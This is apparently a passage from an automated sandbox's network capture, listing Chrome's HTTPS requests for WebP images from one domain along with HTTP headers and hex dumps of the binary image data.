                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 23 c5 12 41 0f 85 41 34 09 a8 be 36 8f 3c a6 66 18 07 95 49 e4 ba 10 a7 db 02 6b 47 b6 d6 65 7b 90 da 93 c4 a5 c6 4b 7c 68 f7 0a 23 8f 69 d0 16 8d d2 77 7e 05 ae ef 22 08 b1 20 62 e3 ce b3 56 e6 0b 23 ef d0 dd e3 db ec 20 2e e9 94 c0 02 f1 38 2a c7 1a ac a5 87 2e 09 a8 ec d6 b4 43 92 9c 88 85 88 1b d1 7d d9 de 8f 7e 88 a6 fc 4e 9a 4a 54 77 e9 0c 7c 73 d4 5c cc 57 d3 06 49 06 21 51 4e 97 aa 32 15 11 93 83 19 92 d0 60 ea c3 5a 2b 6b f5 44 16 74 13 fb 53 b3 13 fb 84 86 e9 20 49 fd 5a 28 2e 20 16 e5 ae d9 68 d0 a6 7b cd df e3 e9 52 a6 0e e0 18 ed e2 3a d2 52 e8 40 4b 0b 6a 7f ec e5 84 cc c1 5a 09 15 67 77 b7 d0 3c 81 00 75 52 a8 89 6a ef 45 08 10 aa 74 08 c3 f7 64 01 3c 3c 8f 51 61 96 13 c1 8b c6 c5 66 ff 5e d4 19 58 e2 7f e4 b9 a1 a3 57 2f d7 e5 ba 7c 03 69
                                                                                                          Data Ascii: #AA46<fIkGe{K|h#iw~" bV# .8*.C}~NJTw|s\WI!QN2`Z+kDtS IZ(. h{R:R@KjZgw<uRjEtd<<Qaf^XW/|i
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 08 a3 86 a1 83 69 fa dc fc 4c 20 df 9d 45 04 a6 f0 dd 02 d6 17 a1 12 f7 29 bb 53 9b a3 87 ca 4d 36 f0 b9 f9 87 df 7c c8 d6 6e 92 79 89 a5 5e f0 57 38 dc 0d 64 91 ef 46 12 de 4f 16 0e 4f 02 04 b6 4e 99 cc 51 eb a2 f5 9e 54 3c dc f7 19 07 58 19 26 89 8f 25 f3 30 55 ae 1f e3 63 75 a6 c5 e1 be 60 0a 50 a8 cf 33 20 89 33 77 01 22 ce 84 29 0f fb 5f a8 3c 41 11 2f 62 ff 34 d9 c8 26 69 65 6e e5 ff 29 ab 6e 1e 25 c4 33 2e 4a 81 24 c8 51 e2 cf f6 09 3d 35 23 a9 d2 c5 c7 72 17 3d a6 d2 4a 60 c0 94 1a 3e 55 d9 2a 5a 07 8c 94 51 6c 2c 6c 0b 1d 30 3a c9 a7 7a c0 a5 60 ed 14 9a 3e a4 50 a1 c4 4d 88 55 d8 95 b2 33 64 4e 73 32 71 09 c8 1a 4f ba 6b dc db e6 53 38 38 2e a9 5b c5 df ed 77 b5 c0 c2 1b 0b de 98 63 fb 97 49 23 28 e5 d8 fc 01 89 15 67 66 ec 00 00 fe f9 1d 4c 07
                                                                                                          Data Ascii: iL E)SM6|ny^W8dFOONQT<X&%0Ucu`P3 3w")_<A/b4&ien)n%3.J$Q=5#r=J`>U*ZQl,l0:z`>PMU3dNs2qOkS88.[wcI#(gfL
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 8e 08 ff b0 ed 23 e4 e7 94 33 a0 20 db 26 70 cb da 3f da 81 b4 eb 94 7d f8 3f 8e d8 b9 47 71 89 a9 1d 09 0c 52 93 84 eb 9f 57 7c 56 32 d2 93 ec 09 ce 5a 11 8d 12 d6 3b c1 7f ce c7 be 88 eb 40 14 56 ac 18 74 80 0a 6a 57 36 82 b6 e4 22 79 68 5b cd 37 31 11 d1 39 39 93 cf 24 b3 f3 3d c9 e9 20 8e 1b fa c3 f1 aa e8 1a ef 14 2e 18 26 6e 11 1f a1 c2 6c 4b 04 0e 92 eb f6 84 bd af 12 8d 25 1e cc 20 51 63 c1 30 08 ce b1 0a 81 90 df f9 9a 88 10 16 9f ff a5 b2 1f d5 85 bf 41 23 04 4e ec d4 f5 6a 46 91 97 1e 5b c3 8e 88 f9 a1 17 eb dc 75 d1 fc 61 86 9c 25 e9 57 56 23 2d 3c b7 dc 8a 5e 48 fd a5 1f 1a ac f7 a6 41 1a b5 fd 4d 40 12 4a c4 28 16 a7 a8 59 c5 ac 8f 16 f9 e9 75 e6 14 b8 96 0c 68 e1 c9 6d 76 54 60 79 a3 88 20 72 23 19 91 87 46 cd 42 e3 5c 7c 37 01 fd 29 12 20
                                                                                                          Data Ascii: #3 &p?}?GqRW|V2Z;@VtjW6"yh[7199$= .&nlK% Qc0A#NjF[ua%WV#-<^HAM@J(YuhmvT`y r#FB\|7)
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 02 29 e3 58 99 79 1c cd 09 24 43 36 7d 46 2f c2 29 1e fc 33 8f 66 d2 ce a0 30 5b fd 09 97 90 d7 e7 4d 6b 2e 73 02 d2 6e 97 81 f8 23 cc 8f e9 b3 e7 bd e9 34 24 7d 61 48 5d 30 c7 b3 ab fd b9 0f 00 91 20 89 fb b1 fd a2 35 2d f5 f8 85 ef 88 ba f1 78 5a 19 dc 0a 41 5d f8 f8 c0 7e 5a 48 18 16 bb 3b 77 2b 54 c1 9e 5b 74 ad 77 30 9b 40 46 c2 c1 10 40 3a ef 9d f3 10 2f a1 62 30 87 27 92 21 92 94 66 35 3b 09 ae 8c fb 07 99 24 c8 17 eb b6 31 b2 c0 22 11 8f ee 61 b8 e7 46 01 bf 6e c9 14 3d c1 7e b7 1a 7b 9e 77 59 1e 45 6b c7 25 6b 2b 43 4c 97 2e 0c 18 9c f1 e6 2c d9 22 71 88 7c f6 17 55 dc f7 74 f3 7c 75 2a f7 6d b6 51 69 21 89 d3 8f 14 4e 1e ef 0a d5 ed e7 84 71 fb 17 54 b7 65 7c f3 04 e4 c8 60 aa 49 7a 02 19 77 c5 ca 8c 38 0a 67 d6 4d 92 6c bd 38 9f 9c 9c 74 b9 7e
                                                                                                          Data Ascii: )Xy$C6}F/)3f0[Mk.sn#4$}aH]0 5-xZA]~ZH;w+T[tw0@F@:/b0'!f5;$1"aFn=~{wYEk%k+CL.,"q|Ut|u*mQi!NqTe|`Izw8gMl8t~
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 00 94 f3 b7 8d 76 20 18 ab b5 53 e7 7b 55 f0 cb cf 6a a0 a1 8c 72 99 89 c3 0c 3f 62 82 13 54 48 d6 a2 67 ae 1a 51 39 5e 57 29 44 90 28 81 d7 ce 77 30 30 19 d3 b7 e5 f4 7e ed 23 68 9f 7a 77 f8 28 29 e6 c0 b6 b0 1b b2 3d 07 76 2b 0b 9e 4f db e7 d9 5a 68 15 66 67 9d d3 d7 2e 01 60 ea 91 2e 10 4b 4c 30 a5 c2 e0 f6 b0 c3 8f b8 54 46 01 eb f2 44 80 dc 17 92 0a 39 04 68 ce bb 8a 79 fb b5 f7 2d 49 84 30 f9 43 73 24 ba 94 54 42 ba 03 97 a3 d4 76 27 05 27 e5 27 61 70 06 e4 7a f2 dc 9b c9 a1 72 a3 bc c8 88 a2 44 f4 a2 2a f0 da 55 7b c7 5d 2d 68 0b e6 fa 9a 00 05 47 b2 5e 16 92 2e b7 47 db 38 72 e4 d7 10 b3 00 25 39 93 8f 9b 33 ef ce 5a e3 e1 83 d5 97 2e 6f 37 59 29 3e a7 e3 0b 4e 61 bf 90 a1 a1 ce e8 bb 76 4d 8b 50 33 0f ae c2 64 47 3a 8b 7d a8 a5 4f 3a d1 58 e1 9a
                                                                                                          Data Ascii: v S{Ujr?bTHgQ9^W)D(w00~#hzw()=v+OZhfg.`.KL0TFD9hy-I0Cs$TBv'''apzrD*U{]-hG^.G8r%93Z.o7Y)>NavMP3dG:}O:X
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: ca 3e f0 ec 1a 9a c9 3a 79 6b eb 5e 07 4f 21 1c 2a 68 e2 72 03 e6 9c d7 d1 c1 33 d0 e1 79 4e 67 fb a6 73 b7 b3 9a e1 13 43 5c c1 6f 43 3a e9 5f 07 b7 af 90 c9 95 25 5f c4 67 9e a0 51 9a ca 76 c3 62 9a 71 29 9a 62 78 eb e8 d9 3a 16 3d 1c 07 c9 8f 0b 19 7b 1b ec cc 6a a4 38 bd bb 34 b0 95 3b a4 73 cd 00 eb 47 52 f0 ae fc b8 1c ff e7 09 2d 08 02 1d b3 f0 4d 90 60 2f 65 fc 67 99 80 03 cc 23 03 20 4a 79 84 7e e9 05 fb 5c dd 54 49 6c 16 9a 2f f7 86 18 39 ad 34 42 e0 d3 1a f1 4e c8 dd b1 ba 04 0b 88 0c 48 68 21 f4 db 40 3a 9c e8 a1 f6 84 29 fc 31 c9 bc ac ac 3d 10 7a 74 11 06 cd 9c d2 96 c7 14 09 17 1c 10 51 c0 30 f4 4e d4 7e e2 6f 7b b6 ab 0c 50 f9 fb 31 0a f5 73 b0 23 3f 70 7d 8b e0 ab 18 dd 60 26 0b 51 d7 02 2d 69 56 c9 e2 5f 34 16 f2 b3 df e6 fb 7d 3f b3 bf
                                                                                                          Data Ascii: >:yk^O!*hr3yNgsC\oC:_%_gQvbq)bx:={j84;sGR-M`/eg# Jy~\TIl/94BNHh!@:)1=ztQ0N~o{P1s#?p}`&Q-iV_4}?
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 77 b3 28 42 69 d8 07 e9 d1 5f 77 38 b0 63 79 80 48 92 a1 a2 76 f2 69 63 1b b3 96 e8 cc 61 04 eb 70 b5 eb 95 9d e9 43 90 57 16 b8 9d ec 66 57 21 8a f6 b7 8c 31 98 17 8c 35 64 21 e2 96 ce 42 e8 b4 2c 12 c3 ce ec ec 1d 89 bf 63 02 34 63 dc c4 e6 4f a4 01 44 99 8f cf 80 11 f7 76 9b 2b 9b e2 31 94 eb 45 7a 58 32 45 c8 0b 5b fc 21 c5 89 bd c9 55 c9 5d d8 f7 5a be aa f5 52 c5 41 ff a0 16 71 f4 4b 9e 94 df 60 24 dc 4c ec 4b 1a 90 bb 93 0d 2c c3 42 e7 c3 ef ad 7b ce b1 08 6f 1a 0c d7 2f f9 8a da 09 70 01 a3 53 64 14 e5 ad 8c 0a 0c 31 e4 e0 d7 6f 86 65 94 e2 23 31 8e c6 00 2e 6b c2 52 8b 88 56 cd 32 ce ea eb 96 65 f0 97 4d 57 0f e4 72 9d 2c 2b 14 4a 79 80 80 ab 56 8e 2d 9d a7 d0 4a 10 50 78 d8 0b 1a 27 58 95 31 60 97 04 ec 49 78 b5 f4 07 d9 10 65 4f 0b f8 1f 39 98
                                                                                                          Data Ascii: w(Bi_w8cyHvicapCWfW!15d!B,c4cODv+1EzX2E[!U]ZRAqK`$LK,B{o/pSd1oe#1.kRV2eMWr,+JyV-JPx'X1`IxeO9
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: ad d9 79 fa 69 a5 1f a3 3a 69 85 54 1f a3 e9 93 de a7 ca f9 b2 9b 2c 9b 9d d0 b7 c4 a9 26 48 91 ec b4 4d b3 06 f0 bd f7 32 d1 38 2c 0c e5 90 57 0f 43 d1 a9 a9 0f e7 50 9c fd 7a 29 d1 d4 65 10 e7 f4 6a ff 81 90 4b ea a1 78 31 ae 8d 7a 51 74 a3 cc 50 c8 c0 08 01 3c 06 88 ab aa ea a3 17 23 7e 87 c2 b8 d9 f6 4e 0f 45 0d 44 5c 6c d5 54 e7 c0 40 20 a7 ff f8 56 10 36 e4 a2 ab fa e2 8c cd 56 1c ac 11 c6 3d 21 62 5b 19 42 9c c4 c4 52 47 c9 7a 99 ef 1c 47 fc d7 ee e0 38 71 8e d3 0d 95 dc 77 0a 3c ca f2 62 f8 47 85 14 58 46 f4 b1 68 20 30 52 20 0d 30 f1 15 d0 26 23 fc d4 f8 bf 38 65 1b 35 80 8b 55 f4 66 da 44 48 02 64 12 0f d9 9d f6 fc 4e ae 09 a2 a6 ae 6f a9 d3 55 11 54 a7 89 ce 06 2b 7a e2 b7 ae 4e 2e 22 94 96 70 6b 83 48 ad f1 b8 be e2 a7 d0 15 8d e7 2b a2 31 c6
                                                                                                          Data Ascii: yi:iT,&HM28,WCPz)ejKx1zQtP<#~NED\lT@ V6V=!b[BRGzG8qw<bGXFh 0R 0&#8e5UfDHdNoUT+zN."pkH+1
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 90 3e 18 90 4f 29 23 dd 41 02 4d 11 70 4d 33 a1 f0 d8 3e 79 0c 65 9d 44 1b 6e 86 fe 08 1f fc fd ca 14 29 4d 1a 7f 6b 4c a0 ec 00 1a 03 4d a8 e1 12 5c d2 0e a4 6f 5d ed 74 84 a7 33 ea 22 df f2 75 27 06 be fb 45 6f f9 a5 28 f5 06 7c 56 b8 1d b1 c3 fa 37 84 25 2b 71 7b 77 92 d5 f2 16 9a c9 95 0d 39 44 a9 b8 0d c6 68 3a 0a d0 1b 5f 6b 8e ff ea dc 61 a7 ad 72 35 f0 86 b1 de 6c e6 1c 03 a4 0a 0b bc a9 6a fa b6 11 5e b8 97 39 e7 0f e1 50 b5 fa 1f 06 2d 31 60 05 13 24 ac 78 91 50 79 8d 71 41 bd f6 f0 ad 6c 88 57 71 60 f5 87 d7 4b aa 85 d2 49 b0 28 99 92 25 f2 68 13 61 de 65 aa 2e 9e e0 0b cb 7d f8 d6 93 01 18 1b 17 47 6a 54 4d 0d f4 25 b5 b4 d9 c3 76 96 d8 2e 53 be 5c 9a d2 cf 99 93 eb a5 14 61 f0 b1 08 e7 ff 76 fd 86 4d 9d f1 54 1a 02 56 a5 f4 ee 36 a7 bb db dd
                                                                                                          Data Ascii: >O)#AMpM3>yeDn)MkLM\o]t3"u'Eo(|V7%+q{w9Dh:_kar5lj^9P-1`$xPyqAlWq`KI(%hae.}GjTM%v.S\avMTV6


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          107192.168.2.450159104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC665OUTGET /_next/static/media/m_28.094ddc20.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC497INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 9632
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-25a0"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 989
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417a8c0543e7-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC872INData Raw: 52 49 46 46 98 25 00 00 57 45 42 50 56 50 38 20 8c 25 00 00 b0 e8 00 9d 01 2a 00 02 00 02 3e 6d 36 95 47 a4 3f a2 21 29 92 89 4b f0 0d 89 67 6e d7 eb 38 94 e1 0c 33 4f 84 ac 30 a6 61 eb 07 44 fc bb f3 fe 0e 7b 6b 93 87 24 fe 6f fe 8f c2 3f e0 7f e3 77 91 fe fd ff 07 d8 6f f9 9f f9 4d f2 0f 41 6f f7 fe 40 3d 7d fd 00 f6 99 fd 00 f2 01 d0 0f fc 03 d2 af ea 1f fa ff d1 ff a4 fd c0 e9 30 fe 2b ff bf 7c 03 b4 aa 0b 63 7d 0e 98 7f 1d ea 20 32 bf ff fc c0 7f ff e8 ff e8 fe d9 b5 f3 cf e1 ef f5 7c 5b fc 83 ea 7f d5 79 b1 e8 ee 31 3e c8 3f c0 f1 ff f2 bd 1d 50 89 d6 0d 3a 96 3a d7 f7 df b5 9e 33 de cc e2 e5 25 b5 0a 9a 7d 30 15 da 6a 44 1a 12 76 6b e7 1a bd 48 e3 57 b2 93 e2 c2 06 78 a9 20 e4 1f 1f b0 09 a6 8d d4 46 7f 07 11 15 0d a6 c0 a1 cb 42 34 ca d3 64 fc b3
                                                                                                          Data Ascii: RIFF%WEBPVP8 %*>m6G?!)Kgn83O0aD{k$o?woMAo@=}0+|c} 2|[y1>?P::3%}0jDvkHWx FB4d
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 91 0c c9 0e 88 ea aa ba b7 de da 15 b4 55 f2 69 11 c9 3c 6b bb fb 03 25 af fc 25 c8 be 9a b8 2e 4e ad 55 21 b0 30 1c 5b a8 c0 3b 78 86 89 ed 7e b0 08 1a 75 da ae a0 80 a2 9e b6 a3 9f 43 69 34 5f 63 3e bb b0 6c ae 30 5d c0 97 e1 90 cf 7a 76 f1 14 38 55 a5 0a 0e 17 af 90 ae fd b0 48 69 8b fd d6 6a 74 7f 7e 21 30 a7 f2 63 60 f7 e7 dd 18 55 be b0 e7 00 60 f6 81 87 56 05 4a a4 2f 36 08 6f 49 93 fd 66 53 af 2a 63 a7 c4 cd 93 50 38 59 03 ab aa 4f 14 94 d4 6b 2e 27 4a 04 5c 10 2e 58 8a ef 90 d0 29 a7 e8 83 b4 d5 e3 ed 50 fd 81 34 6f 40 8e ce dc 20 76 c3 b6 33 9c 20 d2 80 dd 29 23 d7 d0 22 28 a9 05 b4 b0 dc 49 71 f1 72 61 f4 8d 28 5e d9 4f d5 aa d5 ce 7d 9f 3f f4 7e 18 05 8a 76 fb e9 eb 08 57 87 62 1d 66 5f 4a ba 03 98 3a 93 88 69 28 b0 0f 8b fe 94 49 75 ca 86 3a
                                                                                                          Data Ascii: Ui<k%%.NU!0[;x~uCi4_c>l0]zv8UHijt~!0c`U`VJ/6oIfS*cP8YOk.'J\.X)P4o@ v3 )#"(Iqra(^O}?~vWbf_J:i(Iu:
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: d3 d9 41 e0 f3 d6 9f f9 81 e6 00 62 c3 6f 3d 58 c6 cc c8 07 04 e5 b9 5a a3 52 4c 7f cd 8c 3a ab af 54 90 a9 e8 21 c6 79 c0 4e fe 42 60 51 1d 44 a5 65 4a fd f6 d3 fc b4 03 0a 0e c3 45 73 2a d3 45 e8 99 31 75 b2 ab 5a 7a 80 a1 37 ad 6a 36 e1 7d d8 43 19 88 bb 0a dc df 74 35 2f 8b 67 3e 52 a6 8f 1e b0 58 2f 79 6b 1e c0 9d 37 d7 d9 d7 55 8a c8 46 fe 9a a6 1c 28 fa 80 24 4c 3a c0 ac a0 d5 c0 72 2e 08 14 1d 21 23 1c 9f 99 45 59 42 20 ab 42 8c 96 6c 16 57 fc a4 24 fd 7b 55 e7 c1 09 e7 c2 b8 30 1f 1b 28 3a 24 95 24 d4 4e 8a 12 60 2c a5 5e 81 d2 72 2b 17 d5 9f 4c 52 4f 04 cb cf 81 69 d5 c5 30 9e cf 2f 65 9e bf e0 5e f2 a3 3d ce 9a 13 56 07 98 77 f6 83 f4 86 19 f3 1a 70 c3 b8 f0 24 8f c7 4b f4 d6 69 aa ce 9a 68 ed fd 2e 3b 09 78 ab b7 d8 a7 69 ae 00 9c cc 59 5e 37
                                                                                                          Data Ascii: Abo=XZRL:T!yNB`QDeJEs*E1uZz7j6}Ct5/g>RX/yk7UF($L:r.!#EYB BlW${U0(:$$N`,^r+LROi0/e^=Vwp$Kih.;xiY^7
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 77 da ef 94 bf 12 ff 5a 22 1b 37 3c 98 ec 77 61 a6 1a 22 a4 23 e2 81 1f c7 88 00 6d ef 61 56 90 f5 4a f1 70 2b 6a 65 65 f1 60 d7 93 fa 7c 30 c0 7c 4e 39 d2 d5 34 78 57 87 92 c9 61 77 1f 72 be c8 02 46 8a 60 80 b6 3b 91 31 fd 1d dc 22 bd 64 6b 2a 7a 22 e1 1f 10 69 00 4b 0a 98 4b af 28 33 98 78 d9 29 41 82 a3 6c 6f 2e 1e 25 50 e4 c2 46 21 82 87 bd 5c f0 2e b7 3f 7c fe ba e8 59 c2 53 41 0b 7c f5 d6 d6 ac f2 45 e1 7f e5 dd dc 40 b9 5b 7f f1 d3 99 12 75 8c aa d8 4d 62 da 92 23 5b 41 2e d1 45 70 30 2d b3 59 a6 59 2c b9 06 6b ba 8c 6c 7f 76 36 31 84 1b 67 23 d4 50 b8 8e 52 16 a3 b8 8b 00 79 82 a8 66 92 b4 b6 60 0e 74 22 ff e5 fb 95 78 2b 99 c9 7c 48 ab 94 be 92 e7 e9 89 5e 9b 74 c4 1e eb d2 b8 4e 9c 42 f3 c6 f9 61 f1 92 31 0c 53 79 14 cd 6f 4b b3 7f c2 69 ed c4
                                                                                                          Data Ascii: wZ"7<wa"#maVJp+jee`|0|N94xWawrF`;1"dk*z"iKK(3x)Alo.%PF!\.?|YSA|E@[uMb#[A.Ep0-YY,klv61g#PRyf`t"x+|H^tNBa1SyoKi
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: a4 45 c8 24 ec 2a 1a bc 15 7d 0a 0c 13 62 1c 9f 27 ba 71 3c 39 a6 47 97 28 ec ff 53 14 cb 6f 6c fd 56 66 85 72 33 26 4d 94 2d 76 58 cf 72 b5 1b 21 25 97 dc 82 30 35 29 59 be 85 20 f1 06 88 ef 91 12 da b0 fa 6d 25 cd f7 59 68 59 66 52 c6 19 08 f7 9e 37 68 ec 44 54 e0 04 79 11 ed 45 51 7f 57 1f 3e ca 83 90 dd 91 82 7d b7 24 8a ef 55 ba 78 17 12 06 88 88 23 32 c5 4f d1 eb 72 fa cd 21 d5 20 6c 46 8c da 87 5e 55 63 41 6e 9d fb f1 c3 4a eb c2 a5 f4 b3 f9 b3 d6 88 50 3d 49 dd 4a f7 51 82 b2 68 9b 30 fc 78 54 1f 68 c3 50 f3 4b 7d 4a 37 a3 3b a5 ef 76 5d f0 fa ed 15 3d 90 a6 ed 51 1d 1e 8e db fb f5 bf 02 f5 b7 0e fd a9 b8 9e b2 aa de 13 6d 9a 41 1a a8 2d fa 9f e1 a5 6e 7c cb 01 d5 53 0d be b6 7f ee 60 77 f8 f0 13 69 b5 76 ec 6a 76 ea bb 14 31 47 5b c9 68 68 58 37
                                                                                                          Data Ascii: E$*}b'q<9G(SolVfr3&M-vXr!%05)Y m%YhYfR7hDTyEQW>}$Ux#2Or! lF^UcAnJP=IJQh0xThPK}J7;v]=QmA-n|S`wivjv1G[hhX7
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: b5 b1 0b 2a d2 a6 2f 5d 41 df 8b d9 45 64 18 d4 27 d9 0d cd d4 59 28 a5 9d fc 56 f6 d8 57 4d ba 55 74 b7 3b 7b ec dc dc 9d 60 f4 09 7e 0c 8a f2 98 68 42 3a 91 4c 29 eb a1 80 07 4f ef 37 46 66 1e 53 77 c4 ca 62 51 f9 45 b0 f9 9d 5d 32 e4 0a a1 71 d9 26 16 8a 49 23 bf 8a 63 d4 dc c7 cc 9f 76 2f 81 1f 08 18 e9 01 18 1c da 9f 0c 30 df 32 87 03 4a 6d 5c e6 d7 5e e7 35 3a d3 10 f0 ff 87 5e 86 33 7f 0f f5 54 73 14 59 86 aa 45 cb f1 ab 28 85 03 e4 50 be 8d 95 b9 bf a0 df bf 53 e3 bb 95 c7 26 87 4b 9c dc 33 24 13 c1 34 69 70 52 5d eb c5 5a b3 94 33 a3 ca 37 d5 6c 30 22 f5 e3 54 fc 00 00 1e b0 ff 8d e8 02 6c f9 44 f7 55 ef de ba 9a d1 10 a0 f3 e3 72 eb 4f e4 70 0f cf 79 09 03 a6 42 17 d9 27 25 81 e4 c4 d8 b7 00 0f 3b 6c 80 2c 7c b9 80 5b 14 ae d5 c4 e4 34 df a8 4e
                                                                                                          Data Ascii: */]AEd'Y(VWMUt;{`~hB:L)O7FfSwbQE]2q&I#cv/02Jm\^5:^3TsYE(PS&K3$4ipR]Z37l0"TlDUrOpyB'%;l,|[4N
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 3e c1 3f 35 50 ab 12 d3 b9 9d 71 bb e0 16 45 b4 b0 ec 27 b6 79 46 d0 89 25 75 36 6c a9 52 df 8e dc e2 7e d0 47 77 cf 32 6b d5 cf 90 9b 38 dd 92 19 f9 9c 1b 21 91 8e 99 71 74 48 6b 93 4c 43 d9 34 c2 49 5e 5a af 5f dd 10 fc 0f 00 63 e6 30 a9 e5 ea f0 f0 9e 21 71 cc 87 1c 2a b9 06 11 a4 68 2c f0 00 00 07 e3 0c 1a 2c b1 ca e9 92 b6 46 c8 6c 91 e6 df f6 6d 33 5c 6e 4d 68 ff 66 74 c0 aa 85 f2 81 28 49 0f 47 b9 3c 3d 8d c5 bb 6f 9f 5c 4f 6d ff 19 5b a3 54 01 93 9c 03 6a 5b cf de 2d f7 4e 7a 6f 67 fe dc 48 6b c3 8e 93 47 64 b4 42 5a 7c b1 5d 02 f0 fb 21 7c cb a5 1c 03 94 f9 0d 84 e4 94 72 c8 bc 3c e9 c8 31 f8 43 8f 17 d9 23 ba bc 7e 27 dc 00 00 06 23 20 90 20 ef 18 53 62 7b ba f9 ee b0 92 c5 9e 0a 12 52 9c 66 83 c8 59 4d 0e a2 28 8a f6 f7 13 c7 2d fd 1e 61 12 87
                                                                                                          Data Ascii: >?5PqE'yF%u6lR~Gw2k8!qtHkLC4I^Z_c0!q*h,,Flm3\nMhft(IG<=o\Om[Tj[-NzogHkGdBZ|]!|r<1C#~'# Sb{RfYM(-a
                                                                                                          2025-01-06 11:09:25 UTC546INData Raw: e8 56 84 d6 a0 15 e5 c5 ad 25 21 d9 28 30 98 15 db 98 c7 46 66 5f 12 33 b0 e4 da 40 96 47 e2 49 82 7e ae 76 66 9f e3 ab 0f 7c f6 4b 32 bb f6 ed 04 60 72 d3 06 1c cc 8e e3 f6 c5 d5 2a b4 d5 1f 2a fd 99 56 59 9d e6 63 86 3e 68 8d b5 84 ef 71 08 f2 3f 35 73 8f 21 f9 f9 ee b1 3a b8 8d 0d e5 4f b6 de 96 7a 4d f0 5f 51 e2 5e 67 9e 28 27 86 22 37 5b 4a aa b4 18 36 a6 00 f2 9b 93 88 08 d4 eb a2 cc 92 7c 9c 1e f2 75 6a 45 1d ba d6 ba ad c0 c6 c9 01 5e 1d 34 a8 af 9b d4 f2 ba b0 b3 d4 f0 be 09 c6 c0 65 0e 94 f5 0c b6 df 8b 0b 20 7a fc b7 4f 65 47 e8 8f 33 d3 a7 fe 5b bf c0 f7 31 30 47 f8 ea 84 f1 26 32 db 4e 9c 14 ed bb 74 76 ed cd 11 31 9d 78 0b 85 ed d1 6e 8d d0 2f 45 97 90 17 9a 47 ad ab 3c d4 37 b7 ca 2b 02 a5 5e 4f 63 f5 5b 2f 0c f7 9b cf b0 2a a5 eb f2 39 55
                                                                                                          Data Ascii: V%!(0Ff_3@GI~vf|K2`r**VYc>hq?5s!:OzM_Q^g('"7[J6|ujE^4e zOeG3[10G&2Ntv1xn/EG<7+^Oc[/*9U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          108192.168.2.450160104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC665OUTGET /_next/static/media/m_13.99d105c0.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC488INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 11538
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-2d12"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
